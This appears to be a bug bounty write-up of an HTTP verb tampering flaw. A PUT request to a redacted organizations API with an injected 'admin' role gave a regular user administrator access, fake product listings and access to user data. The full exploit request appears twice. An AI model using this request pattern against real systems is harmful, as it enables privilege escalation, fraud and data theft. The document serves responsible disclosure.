HTTP verb tampering results in administrator role to the application

Be very clear about GET/POST/PUT/PATCH traffic

A pretty fun vulnerability that involves HTTP verb tampering and guessing roles to send over.

In the normal business workflow, the application only sends GET requests. However, when I tried sending a PUT request, it turns out I can create and even modify data on the server!

This allowed me to create my own organization. But that was not enough. I could specify roles this organization had, and by educated guesses, sending an admin role made me an administrator to wreak havoc.

Below is the redacted and modified report that was accepted as a high severity vulnerability.

Summary:

The API at https://<REDACTED>/orgs allows low privileged users to send PUT requests, resulting in a new creation of organizations.

The attacker can send a PUT request with the value admin in the rolesoption to create an administrator organization, giving the attack administrator access to the application.

Once there, the attacker can create fake products, or access personal information of all users such as emails, names and phone numbers.

Steps To Reproduce:

Register and login as a regular user
Send a PUT request to https://<REDACTED>/orgs with the following body

PUT /v1/api/orgsHTTP/2
Host: <REDACTED>
Sec-Ch-Ua: "Not;A=Brand";v="99", "Chromium";v="106"
Accept: application/json, text/plain, */*
Authorization: <YOUR AUTH TOKEN>
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 404

{"userid":["<YOUR USER ID>"],"orgid":"<SPOOFED ORG>","roles":["user","admin"]}

Once done, you will have access to https://<REDACTED>/administrator page where you can create products
To create a new product, you have to intercept the request to create a product, and enter the org id you created earlier.e.g.in step 2, if you used spoofed org as the <SPOOFED ORG> value, you have to use spoofed org in this request
Change the product status to be LIVE so other victims may view and purchase the products
Logging in as a victim user, the product can be viewed, added to cart, and checked out
Alternatively, the attacker can access the database to access information about all the users such as emails, names and phone numbers.

Impact

The attacker can create a fake organization with administrative capabilities, access admin functions

The attacker can create bogus products for victims to purchase.

The attacker as an administrator can also access the database to view information about all users

This violates Confidentiality as user information such as emails and names are leaked

This also violates Integrity, because the attacker can spoof as an admin to create fake products, and also to create multiple fake organizations.

PreviousLeaky Error Messages NextDFIR Summary

Last updated 2 years ago

PUT /v1/api/orgsHTTP/2 Host: <REDACTED> Sec-Ch-Ua: "Not;A=Brand";v="99", "Chromium";v="106" Accept: application/json, text/plain, */* Authorization: <YOUR AUTH TOKEN> Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 404 {"userid":["<YOUR USER ID>"],"orgid":"<SPOOFED ORG>","roles":["user","admin"]}